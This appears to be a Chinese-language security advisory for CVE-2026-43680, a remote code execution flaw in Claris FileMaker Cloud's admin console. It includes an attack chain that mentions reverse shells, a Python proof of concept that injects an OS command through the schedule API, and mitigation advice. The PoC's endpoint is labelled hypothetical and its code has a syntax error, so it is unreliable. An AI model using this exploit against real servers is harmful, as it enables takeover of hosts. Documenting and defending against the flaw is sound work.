CVE-2026-43680 CVSS 7.2 高危

CVE-2026-43680 Claris FileMaker Cloud 远程代码执行漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-43680

漏洞类型

远程代码执行 (RCE)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Claris FileMaker Cloud

漏洞概述

Claris FileMaker Cloud 中存在一个远程代码执行漏洞。具有管理员控制台特权的攻击者可以利用该漏洞绕过前端对操作系统脚本计划类型的限制。通过构造特定的请求，攻击者能够在底层主机上执行任意操作系统命令。该漏洞可能导致服务器被完全控制，已在 FileMaker Cloud 2.22.0.5 版本中修复。

技术细节

该漏洞的根本原因在于 Claris FileMaker Cloud 管理控制台的前端验证机制与后端处理逻辑不一致。虽然前端界面试图限制用户创建特定类型的“操作系统脚本计划”，以防止执行任意系统命令，但后端 API 接收数据时未对脚本类型和内容进行严格的二次校验。攻击者首先需要拥有管理员控制台的高权限账号（PR:H）。在获得权限后，攻击者可以通过拦截并修改发送至服务器的 API 请求（例如将计划类型修改为受限的 OS Script 类型，并在脚本正文中注入恶意 Shell 命令）。由于后端信任经过认证的管理员请求，直接将恶意指令传递给操作系统的调度器执行，从而导致远程代码执行。

攻击链分析

STEP 1

步骤1：获取高权限凭证

攻击者通过钓鱼、社会工程学或其他手段获取 Claris FileMaker Cloud 管理控制台的高级管理员账号密码或 Token。

STEP 2

步骤2：访问管理接口

攻击者使用获取的凭证登录 FileMaker Cloud 的管理员控制台。

STEP 3

步骤3：构造恶意请求

攻击者分析前端请求，拦截创建计划任务的 API 调用，修改参数将脚本类型设置为被前端限制的“系统脚本”，并注入任意操作系统命令（如反弹 Shell）。

STEP 4

步骤4：绕过前端验证

直接向后端 API 发送构造好的恶意数据包。后端因缺乏对脚本类型的严格校验，接受该请求。

STEP 5

步骤5：执行任意代码

服务器调度器解析恶意计划任务，在底层操作系统上执行攻击者注入的命令，导致服务器失陷。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target API endpoint for creating schedules (Hypothetical endpoint based on vulnerability description)
target_url = "https://<filemaker-cloud-host>/fmi/admin/api/v1/schedules"

# Admin session cookie or token (Required due to PR:H privilege requirement)
admin_session_token = "<VALID_ADMIN_CONSOLE_TOKEN>"

# Headers
headers = {
    "Authorization": f"Bearer {admin_session_token}",
    "Content-Type": "application/json"
}

# PoC Payload: Bypassing frontend restriction to execute arbitrary OS commands
# The frontend usually restricts 'scriptType' to safe options, but we send 'system' directly.
payload = {
    "scheduleName": "Malicious_PoC_Task",
    "scriptType": "system",  # Bypass front-end restriction
    "command": "touch /tmp/poc_success && whoami", # Arbitrary OS command to execute
    "enabled": true
}

try:
    # Send malicious request to backend API
    response = requests.post(target_url, json=payload, headers=headers, verify=False)
    
    if response.status_code == 201:
        print("[+] PoC Successful: Malicious schedule created.")
        print("[+] The command 'touch /tmp/poc_success' should have been executed on the host.")
    else:
        print(f"[-] PoC Failed with status code: {response.status_code}")
        print(response.text)

except Exception as e:
    print(f"Error: {e}")

影响范围

Claris FileMaker Cloud < 2.22.0.5

防御指南

临时缓解措施

如果无法立即升级，请严格限制管理员账户的使用，仅允许可信的内网 IP 访问管理控制台。此外，应在网络层面监控对 FileMaker Cloud 管理接口的异常 API 调用，特别是涉及计划任务创建的请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表